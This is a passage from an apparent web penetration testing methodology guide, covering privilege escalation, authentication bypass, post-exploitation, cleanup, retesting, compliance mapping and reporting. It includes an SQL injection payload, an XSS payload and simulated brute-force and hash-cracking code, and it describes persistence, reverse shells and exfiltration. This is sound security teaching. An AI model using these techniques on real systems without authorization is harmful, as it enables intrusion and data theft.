$ ./exploit_priv_escalation   # run compiled exploit for a known vulnerability
# whoami
root

In this hypothetical snippet, the tester had a local exploit (perhaps for Dirty COW or similar kernel vulnerability) and after running it, the prompt changed from $ (normal user) to # (root), indicating full system compromise.

In many cases, privilege escalation on the host is beyond the strict scope of a web app test unless explicitly allowed (it turns a web vuln into infrastructure takeover). But it’s often allowed to illustrate impact. For example, through an SQL injection leading to RCE, the tester spawns a shell and then escalates to root, demonstrating that the entire server could be owned. This underscores the risk to the client in concrete terms.

Even within the app, an example of vertical priv esc: Suppose the tester finds an “admin=true” flag in a session cookie. If setting that to true as a normal user grants admin rights (because the app does not properly validate it on the server side), the tester has effectively escalated privileges. They would demonstrate by, say, accessing the admin dashboard and taking a screenshot.
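One common server-side defense against exactly this kind of cookie-flag tampering is to sign session data so the server can detect any client-side modification. A sketch using Python’s hmac module (the secret and cookie format are hypothetical, not a specific framework’s scheme):

```python
import hashlib
import hmac

SECRET = b"server-side-secret"  # hypothetical key, never sent to the client

def sign(value: str) -> str:
    # HMAC-SHA256 signature over the cookie value.
    return hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()

# Server issues the cookie for a normal user along with its signature.
cookie_value, cookie_sig = "admin=false", sign("admin=false")

# The attacker flips the flag but cannot forge the matching signature.
tampered = "admin=true"
print(hmac.compare_digest(sign(tampered), cookie_sig))      # False: rejected
print(hmac.compare_digest(sign(cookie_value), cookie_sig))  # True: legitimate
```

Even with signing, the cleanest design is to keep authorization state server-side and treat any client-supplied role claim as untrusted input.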

Privilege escalation exploitation shows how an initial foothold can lead to broader compromise. Testers will often chain vulnerabilities here – for instance, use SQL injection to get a user password hash, crack it to login, then from that user account exploit an insecure direct object reference to access admin data.

Example: Authentication Bypass

Scenario: The tester suspects or discovers a flaw that allows skipping or bypassing the normal authentication process of the application. We already saw one form of auth bypass via SQL injection. However, there are other kinds of authentication bypasses, such as logic flaws or use of default credentials.

Default Credentials / Weak Credentials: It’s surprising how often admin interfaces use default passwords (like admin:admin or admin:password). A tester will try a list of very common credentials on login pages (especially for known software if the app uses something off-the-shelf). If an admin console is found, trying admin/admin or administrator/password123 might yield access. This isn’t fancy, but it’s a valid exploitation of weak security practices. For example, a network device or a CMS backend might still have the factory default password – logging in with that gives full control.

Authentication Logic Flaws: Sometimes the flaw is in how the app handles sessions or password reset. Consider a password reset function that emails a link with a token like https://site/reset?token=ABC123. If the token is not properly random or is guessable (maybe it’s just a base64 of the username), a tester might predict tokens and reset other users’ passwords (gaining access to their accounts). That’s an auth bypass in the sense of account takeover without knowing credentials.

Another example is multi-step auth where a tester can force the app to skip a step. For instance, in OAuth flows, if the app isn’t careful, a tester might be able to manipulate a hidden form value to mark email verification as done without actually entering a code.

Session Hijacking: If the tester can steal a valid session cookie (through XSS or sniffing an insecure connection), that’s effectively an auth bypass – they bypass login by using someone else’s session. During exploitation, the tester might demonstrate this by sidejacking their own account’s session in another browser to show it’s possible (especially if cookies aren’t tied to IP or have other protections).

Snippet (for a simple logic bypass): This is not an exact payload like the others, but consider an app that sets a cookie logged_in=false when the login page loads and flips it to true after successful authentication. What if the tester manually changes logged_in=false to true before authenticating? If the server naively trusts that cookie, the tester is in. (This would be a very blatant flaw, but such things have occurred in poorly designed systems.)

A real example: Some years ago, certain frameworks had URL rewriting for login, like https://site.com/login?returnUrl=/admin. If you changed the URL to https://site.com/admin without a session, some misconfigured systems would internally create a session for you as admin (skipping auth). Testers check these odd cases too.

Brute Force Attacks: If no lockout is implemented, a tester might attempt a brute-force of credentials. Tools like Hydra or Burp Intruder can try many username/password combos. While not exactly a “bypass” (it’s just guessing the correct password), in absence of protections it’s a serious risk. A common exploitation is to use a list of leaked passwords against known user emails – if one works, the tester proves a breach (and recommends adding 2FA or lockout).
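The logic of such a credential-guessing attack is trivial, which is exactly why rate limiting and lockout matter. A sketch against a hypothetical stand-in for the login endpoint (no real network calls; in a live test this loop would be Hydra or Burp Intruder issuing HTTP requests):

```python
COMMON_PASSWORDS = ["123456", "password", "admin", "letmein", "s3cret"]

def check_login(username, password):
    # Hypothetical stand-in for the target's login check.
    return (username, password) == ("admin", "letmein")

found = None
for attempt, candidate in enumerate(COMMON_PASSWORDS, start=1):
    if check_login("admin", candidate):
        found = candidate
        break

print(found, attempt)  # letmein 4 -- recovered in a handful of guesses
```

With no lockout, nothing stops this loop from running over a list of millions of leaked passwords, which is the scenario the recommendation of 2FA and lockout addresses.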

In all cases of auth bypass, once in, the tester confirms what level of access they have. If it’s an admin account, they’ll test some safe admin actions to demonstrate control (like viewing user lists, etc.). If it’s a user account takeover, they may illustrate by retrieving that user’s personal data.

Tools and Techniques for Exploitation:

During exploitation, various specialized tools might be used depending on the vulnerability:

  • Burp Suite Repeater/Intruder: For manual crafting and replaying of malicious requests (SQLi, XSS payload injection, modifying parameters for auth bypass, etc.). Burp’s extensible plugins (like Autorize for authZ testing) help too.
  • SQLMap: As mentioned, automates SQL injection exploitation and data dumping.
  • Metasploit Framework: Useful if the exploitation involves known exploits (e.g., exploiting an outdated software version on the server). It has modules for many CVEs – for example, if recon found the server runs a vulnerable version of Apache Struts, Metasploit likely has an exploit module to get a shell.
  • Custom scripts or one-liners: For instance, using cURL or Python requests to loop through numeric IDs (for IDOR testing) or to exploit an API.
  • Browser and Proxy: Simply using the web app in a browser with developer tools can be enough for certain exploits (like intercepting and modifying a JWT token).
  • Privilege Escalation scripts: If OS-level work is involved, tools like LinPEAS/WinPEAS (for automated local enumeration), mimikatz (to extract Windows credentials from memory after privilege escalation), etc., could be employed.

Throughout exploitation, the tester maintains professionalism: only doing what’s allowed (e.g., if they exploit a vulnerability to exfiltrate data, they might extract just a few records as proof, not the entire database). The goal is to demonstrate impact without causing undue harm to the system or data integrity. For example, if the test is on a production system with real data, and they achieve admin, they won’t actually delete users or change passwords; instead, they might create a harmless indicator (like a test user or a file) to prove the level of access and then remove it.

By the end of exploitation, the tester typically has gathered “trophies” – evidence of what they could do. This could be screenshots of an admin dashboard they shouldn’t be able to access, a snippet of sensitive data pulled from the database, or a shell prompt showing # (root) access on a server. This evidence is extremely useful for the report and for convincing stakeholders of the seriousness of the findings.

Post-Exploitation

Once initial exploits have been carried out, the test moves to Post-Exploitation. In this phase, the focus is on consolidating access, analyzing the value of compromised targets, and determining how an attacker could further leverage this access. Essentially, now that “the door is open,” what can be done inside? For a web application test, post-exploitation often involves working with the results of exploitation, such as exploring a system accessed via a shell or sifting through data that was retrieved. It’s also about demonstrating the potential impact more fully – showing the worst-case scenarios if an attacker were in the same position.

Key objectives and activities in post-exploitation include:

  • Assess the Compromised System’s Value: Determine what sensitive information resides on or behind the system that was exploited. In a web app context, if the tester gained access to the web server, what data does it hold? Perhaps configuration files with passwords, databases with customer info, or access to internal networks. According to PTES, post-exploitation involves identifying the sensitivity of data on the compromised machine and its usefulness for further attacks. For example, the tester might find a database connection string in a config file; using that, they can connect to the database and dump customer records – showing the business impact.
  • Data Exfiltration: Simulate an attacker’s attempt to steal data. The tester may gather samples of sensitive data such as user records, proprietary documents, or credentials. This could involve running queries on a database (if SQL injection gave direct DB access) or using the file system access via a shell to locate files of interest (like /etc/passwd, log files containing PII, or backup files). They may also test exfiltration channels – e.g., can data be sent out over the internet from the server? If the organization has egress filters, a creative tester might try to bypass them (for instance, if direct FTP is blocked, maybe DNS queries can be used to smuggle data). Mapping and testing exfiltration paths is part of post-exploitation in advanced engagements, but in a typical web app pentest, it might suffice to show that large volumes of data could be pulled out via the exploited channel.
  • Privilege Persistence: If allowed by the rules, the tester can demonstrate ways an attacker would maintain long-term access. This could be adding a new admin user account (in the application or on the server OS), installing a web shell or a scheduled task that reopens access, or leaving a backdoor in code. Persistence techniques include things like adding an SSH key to ~/.ssh/authorized_keys on a Linux server, or creating a hidden administrative user in the web app database. However, testers must be cautious – any persistent mechanism should be temporary and agreed-upon, and must be removed during cleanup. The purpose is to illustrate that an attacker, once in, could lurk in the system indefinitely despite reboots or password changes. For instance, the Cyphere ISO27001 guide notes testers might attempt to establish a persistent presence through privilege escalation to mimic sophisticated attackers.
  • Lateral Movement: Although more relevant in network pentests, even in a web test, if the web server is part of a larger network and the tester now has a foothold, they might see if they can pivot. For example, from a compromised web server, they might try to reach an internal application or database that was not directly accessible. This goes beyond the web app itself, but sometimes web apps are an entry to internal networks. If in scope, the tester can illustrate risk by pivoting: using the compromised host to scan the internal network or access an intranet site. (This is often out of scope unless it’s a full red-team type test.)
  • Cleaning up Tracks (Interim): Real attackers cover their tracks (log editing, etc.). Testers may not extensively do this (because leaving evidence for the client can be helpful), but they might check what traces their activities left (e.g., see logs) to advise on detection capabilities. Part of post-exploitation could be noting which events were or were not detected by the organization’s monitoring.
  • Documenting Actions: Post-exploitation involves a lot of documentation of what’s been done: noting all compromised accounts, data accessed, and persistence methods set. This is not just for the report but also to ensure the tester can undo changes later. PTES emphasizes keeping a detailed list of actions (and times) for everything done on compromised systems, which will be given to the client to verify nothing malicious remains and to learn how to improve their detection.

Some practical examples in a web context:

  • After SQL injecting the database, the tester finds a table of user passwords (hashed). They might extract it and then attempt to crack those hashes offline. If successful (say many were weak MD5 hashes), they now have users’ plaintext passwords. If any of those users reuse passwords elsewhere (including possibly admin accounts on other systems), it’s a gold mine. This would be a strong post-exploitation result (demonstrating password weaknesses and the risk of reuse).
  • The tester uploads a web shell via an insecure file upload function (e.g., they managed to upload shell.jsp and access it). Now post-exploitation: through that shell, they enumerate the system, find an AWS CLI configuration file with credentials. They use those credentials to list S3 buckets – discovering one with sensitive files. They download a sample file to show this. Now the compromise extended to cloud storage because of that foothold.
  • If the web app interacts with other systems (message queues, internal APIs), the tester might use the compromised app context to call those as a malicious actor. For example, using an admin token they found, they call an internal API to fetch all customer data or issue financial transactions (if it’s a banking app).
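The offline hash-cracking step mentioned in the first example can be sketched as a simple dictionary attack. The dumped hashes and wordlist here are hypothetical sample data; real engagements would use hashcat or John the Ripper with far larger wordlists:

```python
import hashlib

# Hashes "dumped" from the compromised table (hypothetical sample data).
dumped = {
    "alice": hashlib.md5(b"sunshine").hexdigest(),
    "bob": hashlib.md5(b"Tr0ub4dor&3").hexdigest(),
}

wordlist = ["password", "qwerty", "sunshine"]

# Unsalted fast hashes like MD5 fall to a straight dictionary attack.
cracked = {}
for user, digest in dumped.items():
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            cracked[user] = word

print(cracked)  # {'alice': 'sunshine'} -- bob's stronger password survives
```

The speed of this loop is the argument for slow, salted password hashing (bcrypt, scrypt, Argon2) in the remediation guidance.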

Tools for Post-Exploitation: This phase often uses general OS tools or custom scripts rather than specialized “hacking” tools:

  • On a compromised server: standard command-line tools (Windows net user to create accounts, powershell scripts for deeper actions; Linux netcat for opening reverse shells out, tar/scp to exfil files).
  • For data search: utilities like find or grep on Linux to locate files containing certain keywords (like “password” or “SECRET_KEY”).
  • For pivoting: tools like ProxyChains or SSH tunnels, or Metasploit’s pivoting features, to route traffic through the compromised host.
  • For persistence: scripts to add services or use Metasploit’s persistence modules (again, only if agreed).
  • For extraction: If dealing with databases, maybe native client tools (mysqldump, pg_dump) to dump data after gaining credentials. Or even using the web app’s functionality (if it has an export feature, abuse it with admin rights).
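The data-search step (the find/grep bullet above) can be mimicked in Python. The directory tree built here is a hypothetical stand-in for a compromised host’s filesystem:

```python
import os
import tempfile

# Build a hypothetical directory tree standing in for a compromised host.
root = tempfile.mkdtemp()
os.makedirs(os.path.join(root, "config"))
with open(os.path.join(root, "config", "settings.env"), "w") as f:
    f.write("DB_PASSWORD=hunter2\n")
with open(os.path.join(root, "readme.txt"), "w") as f:
    f.write("nothing of interest here\n")

# Sweep the tree for files mentioning credentials, as `grep -ril` would.
hits = []
for dirpath, _, filenames in os.walk(root):
    for name in filenames:
        path = os.path.join(dirpath, name)
        with open(path) as f:
            if "password" in f.read().lower():
                hits.append(os.path.relpath(path, root))

print(hits)
```

Tools like LinPEAS automate exactly this kind of sweep, with many more keywords and known credential-file locations.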

The Purpose of Post-Exploitation is well summarized by PTES: determine the value of the compromised machine (the sensitivity of its data, its role in the network) and maintain control for later use. For our purposes, we demonstrate what an attacker could do with the foothold. This often drives home the true business impact to stakeholders – e.g., it’s one thing to say “SQL injection allows access to the database,” but another to show “Using that access, an attacker could download the entire customer list including unencrypted credit card numbers” (which would be a clear violation of PCI-DSS and a catastrophic breach scenario).

By the end of post-exploitation, the tester has painted the full picture of the breach: initial hole -> entry -> deeper penetration -> potential damage (data theft, etc.) -> persistence. This sets the stage for the final steps of the engagement, which are cleanup (removing any artifacts left and restoring systems to pre-test state) and retesting if fixes are applied, followed by the crucial task of reporting all findings in a clear manner.

Cleanup and Retesting

After the exploits and post-exploitation activities, it’s vital to restore the target environment to its original state and ensure no harmful changes persist. The Cleanup phase involves undoing any changes the tester made and removing any artifacts left on the systems. Following cleanup (and after the client addresses the findings), Retesting is performed to verify that the vulnerabilities have been fixed properly and that no new issues have been introduced.

Cleanup: Responsible penetration testers will leave the target as they found it (with the exception of any agreed-upon changes or evidence artifacts that the client wants to keep for analysis). Cleanup tasks can include:

  • Removing Files and Tools: Delete any shells, scripts, or files uploaded to the target during testing. For instance, if a web shell or exploit code was placed on the server, it must be removed. If any executables or temporary files were created (like output from a tool saved on the server), those are deleted as well.
  • Removing User Accounts or Access: If the tester created any test user accounts (e.g., an admin account in the application or a new OS user on the server), those should be removed. Similarly, if any passwords were changed for testing purposes, revert them to original values (the client may handle that part, depending on arrangements).
  • Restoring Configurations: If any configuration was altered (perhaps to demonstrate something, like enabling a debug mode, or to drop a firewall temporarily for a test), set it back to original. Document any settings that could not be changed back so the client knows to handle them.
  • Clearing Log Entries (if agreed/necessary): Generally, testers do not tamper with logs in client environments (as it’s valuable for the client to see evidence of the attacks for learning and improving detection). However, if there was a need to avoid triggering too many alerts, sometimes testers coordinate with the client’s security team. In any case, ensure that nothing the tester did will continue to cause alarms or issues once the test is over.
  • Notify of Any Unintended Impact: If during testing something crashed or got altered unexpectedly (say a service needed a restart, or test data got into the database), make sure the client is aware and the issue is resolved. Pen tests can sometimes cause system instability; part of cleanup is verifying everything is operational.
  • Documentation for Client Verification: Provide the client a list of all changes made during the test (especially in post-exploitation) so they can double-check that all have been addressed. For instance, a list might include: “Created user pentest1 in app (now deleted), added SSH key to server (removed), wrote file /tmp/test.txt (deleted)”.
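Keeping that change list machine-readable from the start makes the hand-off easy. A minimal sketch of such an action log (the field names are illustrative, not any standard format):

```python
from datetime import datetime, timezone

# Hypothetical running log of every change made on target systems, kept so
# the tester can revert each one and hand the list to the client afterwards.
actions = []

def log_action(description):
    actions.append({
        "time": datetime.now(timezone.utc).isoformat(),
        "action": description,
        "reverted": False,
    })

log_action("Created app user 'pentest1'")
log_action("Wrote file /tmp/test.txt")

# During cleanup, each entry is reverted and marked as such.
for entry in actions:
    entry["reverted"] = True

print(all(e["reverted"] for e in actions))  # True -- nothing left behind
```

Any entry that cannot be flipped to reverted (e.g., a setting the client must restore) becomes an explicit item in the hand-off documentation.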

PTES specifically lists cleanup actions such as removing executables, temporary files, scripts, eliminating any rootkits or backdoors installed, and restoring settings to original values. The tester should follow that rigorously, leaving no trace except perhaps log entries.

Retesting: Once the client’s development or security team has fixed the reported vulnerabilities, a retest is usually performed (often as a separate engagement or a follow-up phase) to verify the effectiveness of the remediation. Retesting is important because fixes can sometimes be incomplete or introduce new problems. As Core Security notes, applying a patch or change doesn’t guarantee the issue is truly resolved; only a retest can confirm the vulnerability is gone and nothing else broke in the process.

Key points about retesting:

  • Verify Each Fix: For each major finding from the original test, the tester will attempt to reproduce the original exploit. For example, if SQL injection was found in the search field, after the fix they will try the same payload (' OR 1=1--) or variations, to ensure it no longer works (and ideally, the input is properly handled). If a certain XSS payload executed before, they try it now and confirm it’s neutralized (perhaps it’s now safely encoded or blocked).
  • Test for Regression: Sometimes, fixing one issue can open another. For instance, the development team might have fixed an IDOR by adding an authorization check, but maybe they inadvertently introduced a new XSS in the error page. The retest phase is a sanity check that the overall security has improved, not worsened. It’s about catching scenarios like “the quick fix solved the symptom but not the root cause” or created a different vulnerability.
  • Partial Retest vs Full Retest: In a time-limited engagement, retesting focuses on the issues found previously (not a full redo of the entire test). However, testers remain alert during retest for any glaring new issues. If, say, a new version of the app was deployed to fix things, the tester might do a light scan to see if anything obvious pops up (because sometimes new features or updates come along with the fix).
  • Documentation of Retest Results: Each finding is marked as Resolved, Partially Resolved, or Not Resolved. Partially might mean the specific example was fixed but a variant still exists (e.g., they fixed XSS in one field but another field is still vulnerable using a similar payload). This feedback is crucial for the client to finish the remediation properly.
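A retest checklist can even be semi-automated by replaying each original payload and recording a status per finding. A sketch assuming a hypothetical patched search page whose fix was output encoding:

```python
import html

# Hypothetical retest checklist: each original finding with its payload.
findings = [
    {"id": "F1", "name": "Reflected XSS in q",
     "payload": "<script>alert(1)</script>"},
]

def render_search(q):
    # Stand-in for the patched page; assumes the fix was output encoding.
    return "<p>Results for: %s</p>" % html.escape(q)

status = {}
for f in findings:
    page = render_search(f["payload"])
    status[f["id"]] = "Resolved" if "<script>" not in page else "Not Resolved"

print(status)  # {'F1': 'Resolved'}
```

Automated replay only catches the exact original vector, so manual probing of payload variants is still needed to distinguish Resolved from Partially Resolved.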

Retesting is often highly efficient compared to the initial test. Since the tester already knows the vulnerabilities and attack paths, checking them is quick. Also, the scope is narrower. As one source points out, the second test doesn’t require exploring everything from scratch – the path of attack is known, making it faster to verify the fixes.

Importantly, retesting provides closure to the process: it validates the improved security posture and gives confidence (or indicates need for further fixes). Many compliance regimes (like PCI DSS) expect that after vulnerabilities are fixed, an organization verifies the fixes, which is essentially what retesting accomplishes.

In summary, Cleanup and Retesting ensure that the penetration test leaves the target environment unharmed and more secure:

  • The client is not left with any “gifts” from the tester (like shells or accounts that an actual bad guy could find),
  • All evidence of vulnerabilities is confirmed to be addressed.

By diligently cleaning up, testers uphold trust and professionalism. By retesting, they help close the loop, turning findings into verified improvements. Skipping retest could mean a false sense of security if something was not actually fixed. As a best practice, organizations should always incorporate a retest window after remediation – it’s the only way to confidently declare that the issues have been resolved.

Now that the technical execution of the penetration test is complete, the final – and arguably most important – phase is translating all the work and findings into a clear, actionable Report. Reporting is where the results of the test are communicated to various stakeholders, from developers who will fix the bugs to executives who need to grasp the business impact and compliance implications.

Aligning with Compliance Frameworks (ISO 27001, PCI-DSS, GDPR)

Many organizations conduct penetration tests not only for security best practices but also to meet compliance requirements or recommendations of various frameworks and regulations. It’s important to align the pen test process and outcomes with these frameworks to ensure that the organization can tick the necessary checkboxes and, more meaningfully, to improve their posture in the areas those standards emphasize. Here we discuss how a comprehensive pen test maps to ISO 27001, PCI-DSS, and GDPR, as examples:

  • ISO 27001 (Information Security Management System): ISO 27001 is a risk-based framework that, while not explicitly mandating penetration tests, strongly encourages regular technical vulnerability assessments as part of maintaining an effective ISMS. Control A.12.6.1 – “Management of technical vulnerabilities” in ISO 27001:2013 calls for organizations to obtain information about technical vulnerabilities, assess exposure, and take appropriate measures. A penetration test directly supports this control by simulating real-world attacks to identify vulnerabilities that automated tools or routine checks might miss. In essence, conducting pen tests demonstrates that the organization is proactive in finding and addressing weaknesses, which aligns with ISO 27001’s continuous improvement ethos. In fact, many ISO 27001 certified companies use pen testing as a key mechanism to comply with A.12.6.1. Additionally, findings from pen tests feed into the risk assessment and risk treatment process, ensuring that high-risk vulnerabilities are logged and mitigated in the ISMS. When aligning with ISO 27001, ensure the pen test is well-documented (methodology, scope, results) because auditors may want to see evidence of testing and remediation as part of the certification audit. Regular pen testing (e.g., annually or after major changes) can be cited as a measure for ISO compliance in those areas.
  • PCI-DSS (Payment Card Industry Data Security Standard): PCI-DSS has explicit requirements for penetration testing for any environment that processes or stores payment card data (the Cardholder Data Environment, CDE). In PCI-DSS Requirement 11.3, organizations are required to perform penetration testing at least annually and after any significant changes to the environment. This includes testing both network-layer and application-layer defenses of the CDE. A web application that is part of card processing would fall under this. The standard also requires that discovered vulnerabilities are corrected and that testing is repeated to verify the corrections. Our described methodology (scoping through reporting) fits well with PCI’s expectations: scoping ensures the CDE components are covered; reconnaissance and vulnerability analysis find the weaknesses; exploitation demonstrates what could be done (which helps in risk ranking); and reporting provides the documentation needed for PCI compliance proof. For instance, if the penetration test finds a critical SQL injection that could expose card data, fixing it would be part of PCI compliance, since PCI prohibits storing certain data in insecure ways. The report’s remediation section can map each issue to relevant PCI controls. Example: If an admin interface was found with no multi-factor authentication, that not only is a vuln, it also violates PCI Requirement 8.x on strong access control – this would be noted. With PCI DSS 4.0 (released 2022-2024), the emphasis on testing segmentation controls and more frequent testing is even stronger. A quality pen test aligned with PCI will also check for PCI-specific issues (like ensuring no prohibited data like full track data is exposed, encryption is properly implemented, etc.). In summary, a pen test is not optional for PCI – it’s a mandatory activity, and aligning to it means being thorough in testing all in-scope systems and documenting fixes.
  • GDPR (General Data Protection Regulation): GDPR doesn’t explicitly mandate “thou shalt do pen tests”, but it requires that organizations handling personal data implement appropriate technical and organizational measures to secure that data (Article 32). This includes having a process for regularly testing and assessing the effectiveness of security measures. A penetration test is an excellent way to fulfill that requirement of “regularly testing” your security. In the GDPR context, the focus is on protecting personal data from breach – pen testing helps identify routes by which personal data (names, emails, any PII) could be extracted or compromised, thereby enabling the organization to patch those and reduce breach likelihood. For GDPR alignment, it’s good to map pen test findings to GDPR implications. For example, if a vulnerability allows unauthorized retrieval of user personal details, that is a potential personal data breach scenario that would violate GDPR’s integrity and confidentiality principle (Article 5) and could lead to penalties if not addressed. Showing that you conduct pen tests can be a part of demonstrating compliance with GDPR’s Article 32 (as a “technical measure”). Moreover, if there were ever a breach and the regulator is involved, being able to show a history of pen testing and fixing issues can be a mitigating factor, proving you took reasonable measures. In practice, many companies under GDPR include pen testing in their privacy by design approach – testing new systems before production to ensure data protection controls work. So while GDPR doesn’t demand it by name, pen testing is implicitly recommended to achieve the “state of the art” security measures that GDPR expects.

Other frameworks benefit similarly: HIPAA (healthcare data) encourages regular risk assessments (which can include pen tests), FedRAMP requires periodic pen tests for US government cloud services, and so on. Here, however, the focus remains on ISO 27001, PCI-DSS, and GDPR:

When performing a pen test with compliance in mind, it’s wise for the tester to know which specific checks or outcomes matter for compliance. For instance, PCI cares a great deal that no system has an easily guessable default password and that encryption is properly enforced – so the tester will make sure to check those items and note them. ISO cares that there is a defined process – so the tester might ensure findings are categorized by risk so they fit into the risk treatment workflow.

Finally, in the Reporting phase (next), it’s valuable to include a section or mapping that ties each finding to relevant compliance requirements. For example, a finding of “Insecure password storage” could be mapped to ISO 27001 A.10 (Cryptography) and GDPR Article 32 (security of processing). This helps the organization see the compliance impact of each issue. A penetration testing report essentially becomes evidence for auditors and regulators that due diligence is being done.
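As a lightweight illustration, such a finding-to-control mapping can be kept as structured data alongside the findings and rendered into the report automatically. The sketch below is a minimal example in Python; the specific control identifiers shown are illustrative, not an authoritative mapping:

```python
# Minimal sketch: keep each finding's compliance mapping as data, then
# render a "Finding: Relevant Controls" listing for the report.
# NOTE: control IDs below are illustrative examples only.

findings_to_controls = {
    "SQL Injection in search parameter": [
        "PCI-DSS 6.5 (secure coding for web apps)",
        "GDPR Art. 32 (security of processing)",
    ],
    "Insecure password storage": [
        "ISO 27001 A.10 (Cryptography)",
        "GDPR Art. 32 (security of processing)",
    ],
    "Admin login lacks MFA": [
        "PCI-DSS 8.3 (multi-factor authentication)",
        "ISO 27002 9.4 (access control)",
    ],
}

def compliance_table(mapping: dict) -> str:
    """Render a plain-text compliance-impact listing, one finding per line."""
    return "\n".join(
        f"{finding}: {'; '.join(controls)}"
        for finding, controls in mapping.items()
    )

print(compliance_table(findings_to_controls))
```

Keeping the mapping as data (rather than prose) also makes it easy to regenerate the compliance section after a retest, when some findings change status.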

In summary, aligning the pen test with compliance means:

  1. Understanding the compliance goals during scoping (why the test is being done, what standards are applicable).
  2. Conducting the test thoroughly so that it addresses areas those standards care about.
  3. Mapping and communicating the results in terms of those standards – giving the organization not just a list of vulnerabilities, but also an understanding of how fixing them helps maintain compliance (or how not fixing them could break compliance).

This adds an extra layer of value to the penetration test, speaking the language that management and auditors listen for, and ensuring the test isn’t just a technical exercise, but a compliance enabler as well.

Reporting Results and Recommendations

The final deliverable of a penetration test is the Report, and it is often the most scrutinized part of the engagement. A well-structured report translates all the technical findings into actionable information for various audiences – from technical teams who will remediate issues to executives and compliance officers who need to understand the broader implications. A professional, instructional tone is key, as is a clear organization that allows readers to quickly find the information relevant to them.

A robust penetration test report typically contains the following sections (each serving a distinct purpose):

  • Executive Summary: A high-level overview of the assessment for non-technical stakeholders. This section summarizes the scope of the test, the overall security posture observed, and the key findings and recommendations in business-risk terms. It should highlight the most critical vulnerabilities and their potential impact on the organization’s operations or data. For example, it might state: “The assessment of the Acme web platform revealed 3 critical, 5 high, and 10 medium vulnerabilities. Critical issues include an authentication bypass allowing admin account takeover and a SQL injection exposing customer records. If unaddressed, these could lead to massive data leakage (GDPR impact) and financial fraud. However, no evidence of prior compromise was found, and the organization showed strength in areas like network configuration and encryption.” The executive summary might also note any positive security measures in place and give a big-picture risk rating (e.g., “Overall Risk: High”). If the pen test was driven by compliance or client requirements, it can mention that too (“This test was conducted to satisfy PCI-DSS 11.3; all in-scope systems were tested, and remediation guidance is provided.”). This section should be concise (1-2 pages max) and written in non-technical language, focusing on impact and recommendations rather than technical details.
  • Technical Findings (with Severity Ratings): This is the core detailed section, covering each vulnerability discovered. Findings are typically listed individually, ordered by severity (highest first), and may be further grouped by category (e.g., authentication issues, injection issues). If there are many findings, low-severity or informational ones sometimes go to an appendix, keeping the main section focused on the most important ones. Each finding description should be detailed enough that a developer can understand what to fix, yet succinct where possible. For each finding, the report provides:
    • Title: A brief name, e.g., “SQL Injection in search parameter allows DB extraction”.
    • Severity: Usually rated as Critical/High/Medium/Low/Informational. Some use CVSS scores or custom risk ratings that consider likelihood and impact. The severity assignment should reflect both technical impact and business context. (E.g., an XSS might be high in a banking app, but medium in a brochureware site). Including severity helps the reader prioritize remediation.
    • Description: A clear explanation of the vulnerability. What is it, where is it located, and why does it matter? This should be understandable by developers and security folks. Mention the affected parameters or components.
    • Proof of Concept (Evidence): Showing how the tester exploited or confirmed the issue. This could include excerpts of requests/responses, screenshots, or code snippets. For instance, show the malicious input and the application’s error or output confirming the SQL injection, or a screenshot of an alert box for XSS. Including evidence lends credibility and helps developers reproduce the issue. Terra Security’s guidance suggests including proof of exploitability for each vulnerability.
    • Impact: Describe the potential impact if an attacker exploits this. E.g., “An attacker could dump the entire user database including password hashes” or “Attackers can impersonate other users, including admins, by forging this token”. Framing it in terms of data loss, reputational damage, financial cost, etc., ties it to risk.
    • Likelihood (optional): Some reports discuss how difficult or likely it is to exploit, especially if using CVSS. For example, if a vuln requires auth first, mention that.
    • Affected Assets/URLs: Note exactly what pages or systems are affected so the client knows where to apply fixes.
  • Risk Remediation Guidance: For each finding (often included directly under the finding’s details, or as a separate “Recommendations” column/section), the report should provide actionable remediation steps. The report might also include General Hardening Recommendations if patterns were noticed (e.g., “Several findings were related to outdated components; it is recommended to establish a routine patch management process”), addressing systemic improvements beyond the individual issues. Remediation guidance may include:
    • Short-term Fix: e.g., “Sanitize input using prepared statements to prevent SQL injection.”
    • Long-term Suggestion: e.g., “Adopt an input validation library across the app” or “Implement multi-factor authentication for admin accounts to mitigate risk of credential compromise.”
    • If available, reference best practices or OWASP Cheat Sheet guidance relevant to the issue. Sometimes secure code snippets are given as examples. For instance, if a hardcoded cryptographic key was found, the recommendation might be “Use a secure key management system; do not hardcode keys in source – see NIST guidelines on key management.”
    • Prioritization: While severity guides priority, the report might explicitly say “We recommend addressing Critical and High findings immediately (within 1-2 weeks) and Medium within 1 month, Low as part of ongoing improvements.”
    • If any quick wins were observed (like a system patch that’s pending), note those.
  • Compliance Impact Mapping: A section or column that correlates each finding to specific compliance requirements or industry standards. This mapping is extremely helpful for organizations in regulated industries, as it connects technical risk to compliance risk. The report could include a table with columns such as “Finding – Severity – Relevant Compliance Control(s) – Status”; one entry might read: “Admin Login Lacks MFA – High Severity – (PCI-DSS 8.3, ISO 27002 9.4) – Fails to meet requirement”. This acts as a stamp of whether the organization is compliant on that point; Terra Security notes that this section can serve as a ‘stamp of approval’ or highlight where compliance is not met. By providing this, the report helps compliance officers or auditors see that, say, once vulnerability X is fixed, it will bring the organization into compliance with control Y. If the penetration test is being evaluated by an ISO auditor, for example, they may specifically check that vulnerabilities have been addressed in light of ISO controls – the mapping makes this straightforward. For instance:
    • The SQL injection finding might map to PCI-DSS Requirement 6.5 (secure coding for web apps) and GDPR Article 32 (security of processing).
    • An insufficient logging issue might map to ISO 27001 A.12.4.1 (event logging) or PCI Requirement 10 (logging and monitoring).
  • Methodology and Tools (Appendix): Many reports include a section detailing how the test was conducted (which can be earlier in the report or in an appendix). This might include the test methodology steps (recon, scanning, etc., often to reassure that the test was comprehensive). A list of tools used can be given (e.g., “Nmap v7.93 for port scanning, Burp Suite Pro for web analysis, Nessus for vuln scanning, etc.”). Some clients want to know this to replicate tests or for transparency. This section can also cover any limitations or areas not tested due to scope restrictions.
  • Findings Summary (perhaps an Executive Table): Either at the start or end, a table summarizing all findings by severity gives managers a one-glance overview. For example:

| ID | Vulnerability                     | Severity | Status (Fixed/Not Fixed) |
|----|-----------------------------------|----------|--------------------------|
| 1  | SQL Injection in Products page    | Critical | Not Fixed (as of test)   |
| 2  | Cross-Site Scripting in Feedback  | High     | Not Fixed                |
| 3  | Weak Password Policy (no lockout) | Medium   | Not Fixed                |
| …  | …                                 | …        | …                        |
  • Executive Dashboard (optional): Some reports for execs have pie charts or bar graphs showing the breakdown of findings by severity, or trend compared to last test. This can be a nice visual summary.
